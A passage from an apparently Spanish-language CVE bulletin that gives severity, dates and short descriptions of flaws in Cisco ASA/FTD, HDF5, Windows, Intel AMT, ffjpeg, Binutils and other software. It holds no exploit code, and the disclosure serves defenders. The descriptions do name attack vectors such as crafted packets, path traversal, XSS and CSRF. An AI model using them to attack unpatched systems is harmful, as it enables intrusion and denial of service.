    Dompdf versión 1.2.1, permite una ejecución de código remota por medio de un archivo .php en el campo src:url de una declaración @font-face Cascading Style Sheets (CSS) (dentro de un archivo de entrada HTML)
  • CVE-2018-17233
    Severidad: MEDIA
    Fecha de publicación: 20/09/2018
    Fecha de última actualización: 09/08/2023
    Se lanza una señal SIGFPE en la función H5D__create_chunk_file_map_hyper() de H5Dchunk.c en la biblioteca HDF HDF5 hasta la versión 1.10.3 durante un intento de análisis de un archivo HDF manipulado. Esto se debe a una protección incorrecta contra divisiones entre cero. Esto podría permitir que se realice un ataque de denegación de servicio remoto.
  • CVE-2018-17237
    Severidad: MEDIA
    Fecha de publicación: 20/09/2018
    Fecha de última actualización: 09/08/2023
    Se lanza una señal SIGFPE en la función H5D__chunk_set_info_real() de H5Dchunk.c en la biblioteca HDF HDF5 1.10.3 durante un intento de análisis de un archivo HDF manipulado. Esto se debe a una protección incorrecta contra divisiones entre cero. Este problema es diferente de CVE-2018-11207.
  • Vulnerabilidad en AlchemyCMS (CVE-2018-18307)
    Severidad: MEDIA
    Fecha de publicación: 16/10/2018
    Fecha de última actualización: 07/08/2023
    Se ha descubierto una vulnerabilidad Cross-Site Scripting (XSS) persistente en la versión 4.1.0 de AlchemyCMS mediante el campo de imagen /admin/pictures.
  • CVE-2018-17434
    Severidad: MEDIA
    Fecha de publicación: 24/09/2018
    Fecha de última actualización: 09/08/2023
    Se lanza una señal SIGFPE en la función apply_filters() de h5repack_filters.c en la biblioteca HDF HDF5 hasta la versión 1.10.3 durante un intento de análisis de un archivo HDF manipulado. Esto se debe a una protección incorrecta contra divisiones entre cero. Esto podría permitir que se realice un ataque de denegación de servicio remoto.
  • CVE-2022-38006
    Severidad: Pendiente de análisis
    Fecha de publicación: 13/09/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Divulgación de Windows Graphics Component. Este ID de CVE es diferente de CVE-2022-34728, CVE-2022-35837
  • CVE-2022-37969
    Severidad: Pendiente de análisis
    Fecha de publicación: 13/09/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Common Log File System Driver. Este ID de CVE es diferente de CVE-2022-35803
  • CVE-2022-37954
    Severidad: Pendiente de análisis
    Fecha de publicación: 13/09/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en DirectX Graphics Kernel
  • CVE-2022-35841
    Severidad: Pendiente de análisis
    Fecha de publicación: 13/09/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Ejecución de Código Remota en Windows Enterprise App Management Service
  • CVE-2022-35838
    Severidad: Pendiente de análisis
    Fecha de publicación: 13/09/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Denegación de Servicio en HTTP V3
  • CVE-2022-35836
    Severidad: Pendiente de análisis
    Fecha de publicación: 13/09/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Ejecución de Código Remota en Microsoft OLE DB Provider for SQL Server. Este ID de CVE es diferente de CVE-2022-34731, CVE-2022-34733, CVE-2022-35834, CVE-2022-35835, CVE-2022-35840
  • CVE-2022-35835
    Severidad: Pendiente de análisis
    Fecha de publicación: 13/09/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Ejecución de Código Remota de Microsoft OLE DB Provider for SQL Server. Este ID de CVE es diferente de CVE-2022-34731, CVE-2022-34733, CVE-2022-35834, CVE-2022-35836, CVE-2022-35840
  • CVE-2022-35833
    Severidad: Pendiente de análisis
    Fecha de publicación: 13/09/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Denegación de Servicio en Windows Secure Channel. Este ID de CVE es diferente de CVE-2022-30196
  • CVE-2018-17234
    Severidad: MEDIA
    Fecha de publicación: 20/09/2018
    Fecha de última actualización: 09/08/2023
    Fuga de memoria en la función H5O__chunk_deserialize() en H5Ocache.c en la biblioteca HDF HDF5 hasta la versión 1.10.3 permite a los atacantes causar una denegación de servicio (consumo de recursos) utilizando un archivo .HDF5 manipulado.
  • CVE-2018-17437
    Severidad: MEDIA
    Fecha de publicación: 24/09/2018
    Fecha de última actualización: 09/08/2023
    Fuga de memoria en la función H5O_dtype_decode_helper() en H5Odtype.c en la biblioteca HDF HDF5 hasta la versión 1.10.3 permite a los atacantes causar una denegación de servicio (consumo de recursos) utilizando un archivo .HDF5 manipulado.
  • CVE-2018-1002200
    Severidad: MEDIA
    Fecha de publicación: 25/07/2018
    Fecha de última actualización: 02/08/2023
    plexus-archiver en versiones anteriores a la 3.6.0 es vulnerable a un salto de directorio, lo que permite que los atacantes escriban en archivos arbitrarios mediante un ../ (punto punto barra) en una entrada de archivo que se gestiona de manera incorrecta durante la extracción. Esta vulnerabilidad también se conoce como "Zip-Slip".
  • CVE-2018-3616
    Severidad: MEDIA
    Fecha de publicación: 12/09/2018
    Fecha de última actualización: 17/08/2023
    Vulnerabilidad de canal lateral estilo Bleichenbacher en la implementación TLS en Intel Active Management Technology en versiones anteriores a la 12.0.5 podría permitir que un usuario sin autenticar obtenga la clave de sesión TLS por red.
  • CVE-2018-3657
    Severidad: ALTA
    Fecha de publicación: 12/09/2018
    Fecha de última actualización: 17/08/2023
    Múltiples desbordamientos de búfer en Intel AMT en el firmware Intel CSME en versiones anteriores a la 12.0.5 podrían permitir que un usuario privilegiado ejecute código arbitrario con privilegios de ejecución AMT mediante acceso local.
  • CVE-2018-3658
    Severidad: MEDIA
    Fecha de publicación: 12/09/2018
    Fecha de última actualización: 17/08/2023
    Múltiples desbordamientos de búfer en Intel AMT en el firmware Intel CSME en versiones anteriores a la 12.0.5 podrían permitir que un usuario no autenticado con Intel AMT provisionado provoque una denegación de servicio (DoS) parcial mediante acceso de red.
  • CVE-2018-15383
    Severidad: ALTA
    Fecha de publicación: 05/10/2018
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en el controlador del acelerador de hardware criptográfico de Cisco Adaptive Security Appliance (ASA) Software y Cisco Firepower Threat Defense (FTD) Software podría permitir que un atacante remoto no autenticado provoque que un dispositivo afectado se recargue, lo que resulta en una denegación de servicio (DoS) temporal. La vulnerabilidad existe debido a que los dispositivos afectados tienen una cantidad limitada de memoria Direct Memory Access (DMA) y el software afectado gestiona incorrectamente los recursos en condiciones de poca memoria. Un atacante podría explotar esta vulnerabilidad enviando continuamente un gran volumen de tráfico a un dispositivo afectado para agotar la memoria del dispositivo. Si se explota con éxito, esta vulnerabilidad podría permitir que el atacante agote la memoria DMA en el dispositivo afectado, lo que podría provocar que el dispositivo se recargue y desemboque en una denegación de servicio (DoS) temporal.
  • CVE-2018-15397
    Severidad: ALTA
    Fecha de publicación: 05/10/2018
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en la implementación de Traffic Flow Confidentiality (TFC) en la funcionalidad IPsec en Cisco Adaptive Security Appliance (ASA) Software y Cisco Firepower Threat Defense (FTD) Software podría permitir que un atacante remoto no autenticado provoque que un dispositivo afectado se reinicie inesperadamente, lo que resulta en una denegación de servicio (DoS). La vulnerabilidad se debe a un error que podría ocurrir si el software afectado renegocia la clave de cifrado para un túnel IPsec cuando cierto tráfico TFC está en tránsito. Un atacante podría explotar esta vulnerabilidad enviando un flujo de tráfico TFC malicioso a través de un túnel IPsec establecido en un dispositivo afectado. Su explotación con éxito podría permitir que el atacante provoque el cierre inesperado de un proceso demonio en el dispositivo afectado, lo que provocará que el dispositivo se cierre inesperadamente y desemboque en una denegación de servicio (DoS).
  • CVE-2018-15399
    Severidad: ALTA
    Fecha de publicación: 05/10/2018
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en el módulo TCP syslog de Cisco Adaptive Security Appliance (ASA) Software y Cisco Firepower Threat Defense (FTD) Software podrían permitir que un atacante remoto no autenticado agote los búfers de 1550 bytes en un dispositivo afectado, lo que resulta en una denegación de servicio (DoS). La vulnerabilidad se debe a una falta de comprobación de límites en una función interna. Un atacante podría explotar esta vulnerabilidad estableciendo una posición Man-in-the-Middle (MitM) entre un dispositivo afectado y su servidor syslog TCP configurado y, después, modificando la cabecera TCP en los segmentos que se envían desde el servidor syslog al dispositivo afectado. Su explotación con éxito podría permitir que el atacante agote el búfer del dispositivo afectado y haga que todas las funcionalidades basadas en TCP dejen de funcionar, lo que resulta en una denegación de servicio (DoS). Las funcionalidades basadas en TCP incluyen AnyConnect SSL VPN y SSL VPN sin cliente, así como las conexiones de gestión como Secure Shell (SSH), Telnet y HTTPS.
  • CVE-2018-15388
    Severidad: ALTA
    Fecha de publicación: 03/05/2019
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en el proceso de inicio de sesión (login) en la WebVPN de los software Adaptive Security Appliance (ASA) y Firepower Threat Defense (FTD) de Cisco, podría permitir que un atacante remoto no identificado cause un aumento en la utilización de la CPU en un dispositivo afectado. La vulnerabilidad es debido a una carga de procesamiento excesiva para las operaciones de inicio de sesión de WebVPN existentes. Un atacante podría aprovechar esta vulnerabilidad enviando múltiples peticiones de inicio de sesión desde WebVPN al dispositivo. Una operación con éxito podría permitir al atacante incrementar la carga de la CPU en el dispositivo, dando como resultado una condición de Denegación de Servicio (DoS).
  • CVE-2018-15454
    Severidad: ALTA
    Fecha de publicación: 01/11/2018
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en el motor de inspección SIP (Session Initiation Protocol) de Cisco Adaptive Security Appliance (ASA) Software y Cisco Firepower Threat Defense (FTD) Software podría permitir que un atacante remoto no autenticado provoque que un dispositivo afectado se recargue o el alto uso de recursos de la CPU, lo que resulta en una denegación de servicio (DoS). Esta vulnerabilidad se debe a un manejo incorrecto del tráfico SIP. Un atacante podría explotar esta vulnerabilidad enviando peticiones SIP destinadas a desencadenar específicamente este problema en gran proporción en un dispositivo afectado. Aún no existen actualizaciones de software que aborden esta vulnerabilidad.
  • CVE-2018-15465
    Severidad: MEDIA
    Fecha de publicación: 24/12/2018
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en el subsistema de autorización de Cisco Adaptive Security Appliance (ASA) Software podría permitir que un atacante remoto autenticado, pero sin privilegios (niveles 0 y 1), realice acciones privilegiadas mediante el uso de la interfaz de gestión web. La vulnerabilidad se debe a la validación incorrecta de los privilegios del usuario al emplear la interfaz de gestión web. Un atacante podría explotar esta vulnerabilidad enviando peticiones HTTP específicas mediante HTTPS al dispositivo afectado como usuario sin privilegios. Su explotación podría permitir que el atacante recupere archivos (incluyendo la configuración en ejecución) del dispositivo o suba y reemplace imágenes del software en el dispositivo.
  • CVE-2019-12673
    Severidad: MEDIA
    Fecha de publicación: 02/10/2019
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en el motor de inspección FTP del Software Cisco Adaptive Security (ASA) y el Software Cisco Firepower Threat Defense (FTD), podría permitir a un atacante remoto no autenticado causar una condición de denegación de servicio (DoS) en un dispositivo afectado. La vulnerabilidad es debido a una comprobación insuficiente de los datos de FTP. Un atacante podría explotar esta vulnerabilidad mediante el envío de tráfico FTP malicioso por medio de un dispositivo afectado. Una explotación con éxito podría permitir al atacante causar una condición DoS sobre el dispositivo afectado.
  • CVE-2019-12678
    Severidad: MEDIA
    Fecha de publicación: 02/10/2019
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en el módulo de inspección del Session Initiation Protocol (SIP) del Software Cisco Adaptive Security Appliance (ASA) y el Software Cisco Firepower Threat Defense (FTD), podría permitir a un atacante remoto no autenticado causar una condición de denegación de servicio (DoS) en un dispositivo afectado. La vulnerabilidad es debido al análisis inapropiado de los mensajes SIP. Un atacante podría explotar esta vulnerabilidad mediante el envío de un paquete SIP malicioso por medio de un dispositivo afectado. Una explotación con éxito podría permitir al atacante desencadenar un subdesbordamiento de enteros, haciendo que el software intente leer una memoria no asignada y resultando en un bloqueo.
  • CVE-2019-1701
    Severidad: BAJA
    Fecha de publicación: 03/05/2019
    Fecha de última actualización: 15/08/2023
    Las vulnerabilidades múltiples en el servicio WebVPN de Cisco Adaptive Security Appliance (ASA) Software y Cisco Firepower Threat Defense (FTD) Software podrían permitir a un atacante remoto autenticado realizar un ataque de XSS contra un usuario del portal WebVPN de un dispositivo afectado. Las vulnerabilidades existen porque el software no valida suficientemente la entrada suministrada por el usuario en un dispositivo afectado. Un atacante podría explotar estas vulnerabilidades persuadiendo a un usuario de la interfaz para que haga clic en un enlace especialmente generado. Un exploit exitoso podría permitir al atacante ejecutar código de script arbitrario en el contexto de la interfaz afectada o acceder a información sensible basada en navegador. Un atacante necesitaría privilegios de administrador en el dispositivo para explotar estas vulnerabilidades.
  • CVE-2019-1705
    Severidad: MEDIA
    Fecha de publicación: 03/05/2019
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en el administrador de sesiones VPN de acceso remoto de Cisco Adaptive Security Appliance (ASA) Software podría permitir a un atacante remoto no autenticado provocar una condición de denegación de servicio (DoS) en los servicios VPN de acceso remoto. La vulnerabilidad se debe a un problema con el administrador de sesiones VPN de acceso remoto. Un atacante podría explotar esta vulnerabilidad solicitando un número excesivo de sesiones VPN de acceso remoto. Un exploit podría permitir al atacante causar una condición de DoS.
  • CVE-2019-1713
    Severidad: ALTA
    Fecha de publicación: 03/05/2019
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en la interfaz de administración basada en web del software Adaptive Security Appliance (ASA) de Cisco, podría permitir a un atacante remoto no identificado dirigir un ataque de tipo cross-site request forgery (CSRF) en un sistema afectado. La vulnerabilidad es debido a las insuficientes protecciones de CSRF para la interfaz de administración basada en web en un dispositivo afectado. Un atacante podría aprovechar esta vulnerabilidad persuadiendo a un usuario de la interfaz a seguir un enlace malicioso. Una operación con éxito podría permitir al atacante ejecutar acciones arbitrarias con el nivel de privilegio del usuario afectado. Si el usuario tiene privilegios administrativos, el atacante podría alterar la configuración, extraer información o la recarga de un dispositivo afectado.
  • CVE-2019-12695
    Severidad: MEDIA
    Fecha de publicación: 02/10/2019
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en el portal Clientless SSL VPN (WebVPN) de Cisco Adaptive Security Appliance (ASA) y el Software Cisco Firepower Threat Defense (FTD), podría permitir a un atacante remoto no autenticado realizar un ataque de tipo cross-site scripting (XSS) contra un usuario de la interfaz de administración basada en web de un dispositivo afectado. La vulnerabilidad es debido a una comprobación insuficiente de la entrada suministrada por el usuario mediante la interfaz de administración basada en web de un dispositivo afectado. Un atacante podría explotar esta vulnerabilidad al persuadir a un usuario de la interfaz para que haga clic en un enlace diseñado. Una explotación con éxito podría permitir al atacante ejecutar código script arbitrario en el contexto de la interfaz o permitirle al atacante acceder a información confidencial basada en navegador.
  • CVE-2019-15256
    Severidad: ALTA
    Fecha de publicación: 02/10/2019
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en la funcionalidad Internet Key Exchange versión 1 (IKEv1) del Software Cisco Adaptive Security Appliance (ASA) y el Software Cisco Firepower Threat Defense (FTD), podría permitir a un atacante remoto no autenticado desencadenar una recarga de un dispositivo afectado, resultando en un condición de denegación de servicio (DoS). La vulnerabilidad es debido a una administración inapropiada de la memoria del sistema. Un atacante podría explotar esta vulnerabilidad mediante el envío de tráfico malicioso IKEv1 hacia un dispositivo afectado. El atacante no necesita credenciales válidas para autenticar la sesión VPN, ni la dirección de origen del atacante debe coincidir con una declaración de peer en el mapa criptográfico aplicado a la interfaz de entrada del dispositivo afectado. Una explotación podría permitir al atacante agotar los recursos de memoria del sistema, conllevando a la recarga de un dispositivo afectado.
  • CVE-2019-19888
    Severidad: MEDIA
    Fecha de publicación: 18/12/2019
    Fecha de última actualización: 17/08/2023
    La función jfif_decode en el archivo jfif.c en ffjpeg hasta 21-08-2019, presenta un error de división por cero.
  • CVE-2019-19887
    Severidad: MEDIA
    Fecha de publicación: 18/12/2019
    Fecha de última actualización: 17/08/2023
    La función bitstr_tell en el archivo bitstr.c en ffjpeg hasta 21-08-2019, presenta una desreferencia del puntero NULL relacionada con jfif_encode.
  • CVE-2019-9070
    Severidad: MEDIA
    Fecha de publicación: 23/02/2019
    Fecha de última actualización: 16/08/2023
    Se ha descubierto una vulnerabilidad en GNU libiberty, tal y como se distribuye en GNU Binutils 2.32. Es una sobrelectura de búfer basada en memoria dinámica (heap) en d_expression_1 en cp-demangle.c tras numerosas llamadas recursivas.
  • CVE-2019-9077
    Severidad: MEDIA
    Fecha de publicación: 23/02/2019
    Fecha de última actualización: 16/08/2023
    Se ha descubierto un problema en GNU Binutils 2.32. Es un desbordamiento de búfer basado en memoria dinámica (heap) en process_mips_specific en readelf.c mediante una sección de opción MIPS mal formada.
  • CVE-2019-1693
    Severidad: MEDIA
    Fecha de publicación: 03/05/2019
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en el servicio WebVPN del software Cisco Adaptive Security Appliance (ASA) y del software Cisco Firepower Threat Defense (FTD) podía permitir a un atacante remoto, no autenticado, causar una condición de denegación de servicio (DoS) en un dispositivo afectado. La vulnerabilidad es debida una incorrecta gestión de las sesiones autenticadas en el portal WebVPN. Un atacante podría explotar esta vulnerabilidad autenticándose con unas credenciales válidas y accediendo a una URL específica en el portal WebVPN. Una explotación exitosa podría permitir a un atacante causar reinicios en el dispositivo, resultando una condición de DoS temporal.
  • CVE-2019-1694
    Severidad: ALTA
    Fecha de publicación: 03/05/2019
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en el TCP processing engine of Cisco Adaptive Security Appliance (ASA) el Programa y Cisco Firepower Threat Defense (FTD) El programa podría permitir que un atacante remoto no autenticado provoque la recarga de un dispositivo afectado, lo que provocaría una condición de denegación de servicio(DoS). La vulnerabilidad se debe al manejo inapropiado del tráfico TCP. Un atacante podría explotar esta vulnerabilidad enviando una secuencia específica de paquetes a una alta velocidad a través de un dispositivo afectado. Un exploit con éxito podría permitir al atacante interrumpir temporalmente el tráfico a través del dispositivo mientras se reinicia.
  • CVE-2019-1695
    Severidad: MEDIA
    Fecha de publicación: 03/05/2019
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en el motor de detección del software Adaptive Security Appliance (ASA) de Cisco y el software Firepower Threat Defense (FTD) de Cisco, podría permitir que un atacante adyacente no identificado envíe datos directamente hacia el kernel de un dispositivo afectado. La vulnerabilidad se presenta porque el software filtra incorrectamente las tramas de Ethernet enviadas a un dispositivo afectado. Un atacante podría aprovechar esta vulnerabilidad mediante el envío de paquetes creados a la interfaz de administración de un dispositivo afectado. Una operación con éxito podría permitir al atacante omitir los filtros de Capa 2 (L2) y enviar datos directamente hacia el kernel del dispositivo afectado. Una trama maliciosa entregada con éxito haría que el dispositivo de destino generara una entrada syslog específica.
  • CVE-2019-16352
    Severidad: MEDIA
    Fecha de publicación: 16/09/2019
    Fecha de última actualización: 17/08/2023
    ffjpeg antes del 21-08-2019, presenta un desbordamiento de búfer en la región heap de la memoria en la función jfif_load() en el archivo jfif.c.
  • CVE-2020-13654
    Severidad: MEDIA
    Fecha de publicación: 31/12/2020
    Fecha de última actualización: 13/08/2023
    XWiki Platform versiones anteriores a 12.8, maneja inapropiadamente el escape en el visualizador de propiedades.
  • CVE-2021-1062
    Severidad: BAJA
    Fecha de publicación: 08/01/2021
    Fecha de última actualización: 08/08/2023
    El administrador de NVIDIA vGPU contiene una vulnerabilidad en el plugin vGPU, en la que la longitud de datos de entrada no es comprobada, lo que puede conllevar a una manipulación de los datos o a una denegación de servicio. Esto afecta a vGPU versiones 8.x (anteriores a 8.6) y versiones 11.0 (anteriores a 11.3)
  • CVE-2021-1058
    Severidad: BAJA
    Fecha de publicación: 08/01/2021
    Fecha de última actualización: 08/08/2023
    El software NVIDIA vGPU contiene una vulnerabilidad en el controlador del modo kernel invitado y en el plugin vGPU, en el que el tamaño de los datos de entrada no es comprobado, lo que puede conllevar a una alteración de los datos o a una denegación de servicio. Esto afecta a vGPU versiones 8.x (anteriores a 8.6) y versiones 11.0 (anteriores a 11.3)
  • CVE-2021-3011
    Severidad: BAJA
    Fecha de publicación: 07/01/2021
    Fecha de última actualización: 20/07/2023
    Se detectó un problema de canal lateral de ondas electromagnéticas en los microcontroladores de seguridad NXP SmartMX / P5x y en los microcontroladores de autenticación segura A7x, con CryptoLib versiones hasta v2.9. Permite a los atacantes extraer la clave privada ECDSA después de un acceso físico extenso (y en consecuencia producir un clon). Esto se demostró en la Google Titan Security Key, basada en un chip NXP A7005a. También están afectadas otras claves de seguridad FIDO U2F (Yubico YubiKey Neo y Feitian K9, K13, K21 y K40), así como varias tarjetas inteligentes NXP JavaCard (J3A081, J2A081, J3A041, J3D145_M59, J2D145_M59, J3D120D_M60, J3D120_M60, , J2D081_M59, J3D081_M61, J2D081_M61, J3D081_M59_DF, J3D081_M61_DF, J3E081_M64, J3E081_M66, J2E081_M64, J3E041_M66, J3E016_M66, J3E016_M64, J3E041_M64, J3E145_M64, J3E120_M65, J3E082_M65, J2E145_M64, J2E120_M65, J2E082_M65, J3E081_M64_DF, J3E081_M66_DF, J3E041_M66_DF, J3E016_M66_DF, J3E041_M64_DF, y J3E016_M64_DF)
  • CVE-2019-12698
    Severidad: ALTA
    Fecha de publicación: 02/10/2019
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en la funcionalidad WebVPN del Software Cisco Adaptive Security Appliance (ASA) y el Software Cisco Firepower Threat Defense (FTD), podría permitir a un atacante remoto no autenticado causar una mayor utilización de la CPU en un dispositivo afectado. La vulnerabilidad es debido a una carga de procesamiento excesiva para una petición de página HTTP WebVPN específica. Un atacante podría explotar esta vulnerabilidad mediante el envío de múltiples peticiones de carga de página HTTP de WebVPN para una URL específica. Una explotación con éxito podría permitir al atacante aumentar la carga de la CPU en el dispositivo, resultando en una condición de denegación de servicio (DoS), lo que podría causar que el tráfico sea retardado a través del dispositivo.
  • CVE-2019-12693
    Severidad: MEDIA
    Fecha de publicación: 02/10/2019
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en la funcionalidad Secure Copy (SCP) del Software Cisco Adaptive Security Appliance (ASA), podría permitir a un atacante remoto autenticado causar una condición de denegación de servicio (DoS). La vulnerabilidad es debido al uso de un tipo de datos incorrecto para una variable de longitud. Un atacante podría explotar esta vulnerabilidad mediante el inicio de la transferencia de un archivo grande a un dispositivo afectado por medio de SCP. Para explotar esta vulnerabilidad, el atacante necesitaría tener credenciales válidas de nivel de privilegio 15 sobre el dispositivo afectado. Una explotación con éxito podría permitir que el atacante haga que la variable de longitud se desplace, lo que podría causar que el dispositivo afectado se bloquee.
  • CVE-2019-12676
    Severidad: BAJA
    Fecha de publicación: 02/10/2019
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en la implementación de Open Shortest Path First (OSPF) del Software Cisco Adaptive Security Appliance (ASA) y el Software Cisco Firepower Threat Defense (FTD), podría permitir a un atacante adyacente no autenticado causar una recarga de un dispositivo afectado, resultando en una condición de denegación de servicio (DoS). La vulnerabilidad se presenta porque el software afectado analiza inapropiadamente ciertas opciones en los paquetes de tipo 11 de link-state advertisement (LSA) de OSPF. Un atacante podría explotar esta vulnerabilidad mediante el envío de un paquete OSPF LSA tipo 11 diseñado hacia un dispositivo afectado. Una explotación con éxito podría permitir al atacante causar una recarga del dispositivo afectado, resultando en una condición DoS para el tráfico del cliente que está atravesando el dispositivo.
  • CVE-2020-7465
    Severidad: ALTA
    Fecha de publicación: 06/10/2020
    Fecha de última actualización: 18/07/2023
    La implementación L2TP de MPD versiones anteriores a 5.9, permite a un atacante remoto que puede enviar un paquete de control L2TP específicamente diseñado con AVP versión Q.931 Causar Code para ejecutar código arbitrario o causar una denegación de servicio (corrupción de la memoria)
  • CVE-2020-7466
    Severidad: MEDIA
    Fecha de publicación: 06/10/2020
    Fecha de última actualización: 18/07/2023
    La implementación PPP de MPD versiones anteriores a 5.9, permite a un atacante remoto que puede enviar un mensaje de autenticación PPP específicamente diseñado causar que el demonio lea más allá del búfer de memoria asignado, lo que resultaría en una condición de denegación de servicio
  • CVE-2019-11479
    Severidad: MEDIA
    Fecha de publicación: 18/06/2019
    Fecha de última actualización: 16/08/2023
    Jonathan Looney descubrió que el tamaño máximo de segmento (MSS) por defecto del kernel de Linux está codificado a 48 bytes. Esto permite a un peer remoto fragmentar las colas de reenvío de TCP significativamente más que si se aplicara un MSS más grande. Un atacante remoto podría usar esto para causar una denegación de servicio. Esto se ha corregido en versiones de kernel estables 4.4.182, 4.9.182, 4.14.127, 4.19.52, 5.1.11, y se corrige en los commits 967c05aee439e6e5d7d805e195b3a20f5c433d6 y 5f3e2bf008c2221478101ee72f5c4ccccc
  • Vulnerabilidad en la interfaz de servicios web de Cisco Adaptive Security Appliance (ASA) y Cisco Firepower Threat Defense (FTD) Software (CVE-2020-3436)
    Severidad: ALTA
    Fecha de publicación: 21/10/2020
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en la interfaz de servicios web de Cisco Adaptive Security Appliance (ASA) y Cisco Firepower Threat Defense (FTD) Software, podría permitir a un atacante remoto no autenticado cargar archivos de tamaño arbitrario en carpetas específicas en un dispositivo afectado, que podría conllevar a una recarga inesperada del dispositivo. La vulnerabilidad se presenta porque el software afectado no maneja de manera eficiente la escritura de archivos de gran tamaño en carpetas específicas en el sistema de archivos local. Un atacante podría explotar esta vulnerabilidad mediante la carga de archivos en esas carpetas específicas. Una explotación con éxito podría permitir a un atacante escribir un archivo que desencadena un tiempo de espera del watchdog, lo que causaría la recarga inesperada del dispositivo, causando una condición de denegación de servicio (DoS)
  • Vulnerabilidad en el procesamiento de paquetes TCP de Cisco Adaptive Security Appliance (ASA) Software y Cisco Firepower Threat Defense (FTD) Software (CVE-2020-3554)
    Severidad: ALTA
    Fecha de publicación: 21/10/2020
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en el procesamiento de paquetes TCP de Cisco Adaptive Security Appliance (ASA) Software y Cisco Firepower Threat Defense (FTD) Software, podría permitir a un atacante remoto no autenticado causar una condición de denegación de servicio (DoS) en un dispositivo afectado. La vulnerabilidad es debido a una condición de agotamiento de la memoria. Un atacante podría explotar esta vulnerabilidad mediante el envío de una alta tasa de tráfico TCP diseñado por medio de un dispositivo afectado. Una explotación con éxito podría permitir a un atacante agotar los recursos del dispositivo, resultando en una condición de DoS para el tráfico que transita por el dispositivo afectado
  • Vulnerabilidad en el proceso de inspección SIP de Cisco Adaptive Security Appliance (ASA) Software y Cisco Firepower Threat Defense (FTD) Software (CVE-2020-3555)
    Severidad: ALTA
    Fecha de publicación: 21/10/2020
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en el proceso de inspección SIP de Cisco Adaptive Security Appliance (ASA) Software y Cisco Firepower Threat Defense (FTD) Software, podría permitir a un atacante remoto no autenticado causar un bloqueo y la recarga de un dispositivo afectado, resultando en una condición de denegación de servicio ( DoS). La vulnerabilidad es debido a un tiempo de espera del watchdog y un bloqueo durante la limpieza de los subprocesos que están asociados con una conexión SIP que está siendo eliminada de la lista de conexiones. Un atacante podría explotar esta vulnerabilidad mediante el envío de una alta tasa de tráfico SIP diseñado por medio de un dispositivo afectado. Una explotación con éxito podría permitir a un atacante causar un tiempo de espera del watchdog y un bloqueo, resultando en un bloqueo y la recarga del dispositivo afectado
  • Vulnerabilidad en el proceso de inicio seguro de Cisco Adaptive Security Appliance (ASA) Software y Firepower Threat Defense (FTD) Software para Dispositivos Firepower 1000 Series y Firepower 2100 Series (CVE-2020-3458)
    Severidad: MEDIA
    Fecha de publicación: 21/10/2020
    Fecha de última actualización: 16/08/2023
    Múltiples vulnerabilidades en el proceso de inicio seguro de Cisco Adaptive Security Appliance (ASA) Software y Firepower Threat Defense (FTD) Software para Dispositivos Firepower 1000 Series y Firepower 2100 Series podrían permitir a un atacante local autenticado omitir el mecanismo de inicio seguro. Las vulnerabilidades son debido a protecciones insuficientes del proceso de arranque seguro. Un atacante podría explotar estas vulnerabilidades inyectando código en archivos específicos a los que luego se hace referencia durante el proceso de inicio del dispositivo. Una explotación con éxito podría permitir a un atacante romper la cadena de confianza e inyectar código en el proceso de arranque del dispositivo, que se ejecutaría en cada arranque y mantendría la persistencia entre los reinicios
  • Vulnerabilidad en la comprobación de entrada en la CLI de Cisco FXOS Software (CVE-2020-3457)
    Severidad: ALTA
    Fecha de publicación: 21/10/2020
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en la CLI de Cisco FXOS Software, podría permitir a un atacante local autenticado inyectar comandos arbitrarios que son ejecutados con privilegios root. La vulnerabilidad es debido a una comprobación insuficiente de la entrada de los comandos suministrados por el usuario. Un atacante podría explotar esta vulnerabilidad mediante la autenticación en un dispositivo y enviar una entrada diseñada hacia el comando afectado. Una explotación con éxito podría permitir a un atacante ejecutar comandos en el sistema operativo subyacente con privilegios root
  • Vulnerabilidad en la implementación de manejo de fragmentos IP de Cisco Adaptive Security Appliance (ASA) Software y Cisco Firepower Threat Defense (FTD) Software (CVE-2020-3373)
    Severidad: ALTA
    Fecha de publicación: 21/10/2020
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en la implementación de manejo de fragmentos IP de Cisco Adaptive Security Appliance (ASA) Software y Cisco Firepower Threat Defense (FTD) Software, podría permitir a un atacante remoto no autenticado causar una pérdida de memoria en un dispositivo afectado. Esta pérdida de memoria podría impedir que el tráfico sea procesado por medio del dispositivo, resultando en una condición de denegación de servicio (DoS). La vulnerabilidad es debido al manejo inapropiado de errores cuando fallos específicos ocurren durante el reensamblaje del fragmento IP. Un atacante podría explotar esta vulnerabilidad mediante el envío de tráfico IP fragmentado y diseñado hacia un dispositivo objetivo. Una explotación con éxito podría permitir a un atacante consumir memoria continuamente en el dispositivo afectado y eventualmente impactar el tráfico, resultando en una condición de DoS. El dispositivo podría requerir un reinicio manual para recuperarse de la condición de DoS. Nota: Esta vulnerabilidad se aplica tanto al tráfico IP versión 4 (IPv4) como al tráfico IP versión 6 (IPv6)
